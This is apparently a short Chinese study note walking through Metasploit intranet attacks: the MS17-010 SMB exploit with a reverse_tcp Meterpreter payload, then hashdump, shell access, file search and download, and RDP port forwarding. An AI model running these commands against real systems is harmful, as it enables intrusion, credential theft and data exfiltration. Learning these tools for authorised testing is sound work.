内网篇

搞了这么久，还没真正的内网漫游过。趁着闲，学习一下。

msf

1. use exploit/windows/smb/ms17_010 使用一个模块

2. show options 查看配置

3.show payloads 查看所有payload

4. set payload windows/x64/meterpreter/reverse_tcp 返回一个会话

5.会话建立成功

6. screenhost 截图

7.hashdump 获得密码哈希，在线破解就是

8. shell 获得一个cmd

9.background命令，返回把meterpreter后台挂起

10. session -i 继续利用

11.cat C:\\ xxx  查看一个文件内容

12. edit xxxx 修改文件内容

13. upload 上传/  dowload 下载

14. search  -d c:\\ -f *.doc 搜索文件  （在目标主机C盘下搜索doc文档）

15. portfwd 端口转发。portfwd  add -l 1122 -p 3389 -r 192.168.250.176(把远程地址的3389转发到其他端口)